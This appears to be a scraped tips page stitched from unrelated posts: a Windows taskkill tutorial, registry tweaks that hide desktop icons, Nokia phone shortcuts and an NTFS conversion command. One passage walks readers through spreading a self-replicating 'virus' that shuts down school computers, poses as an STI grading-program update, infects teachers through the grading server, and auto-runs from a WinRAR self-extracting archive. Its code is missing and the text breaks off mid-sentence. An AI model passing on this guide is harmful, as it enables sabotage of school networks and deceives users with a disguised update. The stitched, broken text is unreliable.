How to Kill Processes from Command Prompt

I'm sure you are familiar with the traditional way to kill or end a process in Windows using Task Manager. This method is effective but not nearly as fun as killing a process in Command Prompt. Additionally, killing processes in Command Prompt provides much more control and the ability to end multiple processes at once.

All of this is possible with the TaskKill command. First, let's cover the basics. You can kill a process by the process ID (PID) or by image name (EXE filename).

Open up an Administrative level Command Prompt and run tasklist to see all of the running processes:

C:\>tasklist

In the example above you can see the image name and the PID for each process. If you want to kill the firefox process run:

C:\>Taskkill /IM firefox.exe /F

C:\>Taskkill /PID 26356 /F

The /f flag is kills the process forcefully. Failure to use the /F flag will result in nothing happening in some cases. One example is whenever I want to kill the explorer.exe process I have to use the /F flag or else the process just does not terminate.

If you have multiple instances of an image open such as multiple firefox.exe processes, running the taskkill /IM firefox.exe command will kill all instances. When you specify the PID only the specific instane of firefox will be terminated.

The real power of taskkill are the filtering options that allow you to use the following variables and operators.

Variables:

STATUS
IMAGENAME
PID
SESSION
CPUTIME
MEMUSAGE
USERNAME
MODULES
SERVICES
WINDOWTITLE

Operators:

eq (equals)
ne (not equal)
gt (greater than)
lt (less than)

"*" is the wildcard.

You can use the variables and operators with the /FI filtering flag. For example, let's say you want to end all processes that have a window title that starts with "Internet":

C:\>taskkill /FI "WINDOWTITLE eq Internet*" /F

How about killing all processes running under the Steve account:

C:\>taskkill /FI "USERNAME eq Steve" /F

It is also possible to kill a process running on a remote computer with taskkill. Just run the following to kill notepad.exe on a remote computer called SteveDesktop:

C:\>taskkill /S SteveDesktop /U RemoteAccountName /P RemoteAccountPassword /IM notepad.exe /F

To learn more about taskkill run it with the /? command just like any other Windows command.

Publicize your site by having your Blogger.com or Blogspot.com blog site included in Yahoo! Directory and Yahoo! Search. I went to the official Yahoo! submission of URL page and clicked the link “Submit Your Site for Free”. You will be prompted to log in using your Yahoo! account. For those of you who do not have a Yahoo! account, simply sign up for one. It is Free.

After you have your Yahoo! account, and are logged in, you will see this screen.

Select “Submit Site Feed” and enter the URL of your Blog's site feed. You can use either:-

To hide all icons from your desktop:

Go to Start Button and open Run then type: regedit
Click on OK
Go to HKey_Current_User \ Software\ Microsoft \Windows \ Current Version \ Policies \ Explorer
Right click on the right panel and add a New / DWORD
Name it NoDesktop
Give it a value of 1
Logoff or Reboot the computer

Now all icons are hidden on the desktop.

By editing the registry, you can remove Network Neighborhood icon from your desktop. Just follow the below steps:

Go to Start Button and open Run then type: regedit
Go to HKey_Current_User \ Software\ Microsoft \Windows \ Current Version \ Policies \ Explorer
Right click on the right panel and add a New / DWORD
Name it NoNetHood
Give it a value of 1

Now, when you Logoff or Reboot the computer, "Network Neighborhood" icon will not be there.

These shortcuts will work on most of the Nokia phones (especially for N series).
Generic Shortcuts
1. To get the Task Manager
To close a running application you can press and hold the Menu button until all the running task can be seen. Then to close an application highlight it and then press the key

2. To switch to Silent profile

This shortcut is very handy. Press and hold the ( ‘0? key) until the profile changes to Silent. To switch back to normal, press and hold again
3. To select multiple items
In file browser, address book, gallery or anywhere, when you need to select multiple items hold edit key while pressing
To select many files / items press and hold then, (while holding down edit ) move key to the desired direction until the required files are selected.
To remove the selected files /items press

4. Launching the music player

Press and hold the multimedia key until the music player shows up

5. Launching the Browser

Press and hold the 0 key until you see the browser window

6. To get the list of last dialed numbers

press the Call key. Select a number and then again press the Call key to dial that number
7. To get to the Voice Mail Box
Press and hold the ‘1? key . If voice mail box is not defined, it will ask you to define one.
8. Speed dialing
You can set the keys 2-9 for speed dialing. Press and hold the key until it starts dialing. To define speed dials, press and hold an unused number. It will ask you to select a number.
For eg: press and hold the key 2 . If a speed dial is not assigned to this number it will ask you to assign a number for this key. If it is already defined, it will start dialing that number

By using the following command you can shutdown your school or college by using only Note pad.

This is the main command that will be launched upon startup.
Type this in Notepad.

Save this as shutdown.bat, making sure you choose all files as the filetype.

Step 2
Make it run on StartupThe file you need can be downloaded here:This is just a simple registry file that anyone can create, but I don’t feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI.

Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.

Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti

The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click “Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)

if u have a fat or fat32 drive, u can convert it to ntfs by running a command on dos:

convert e:/fs:ntfs
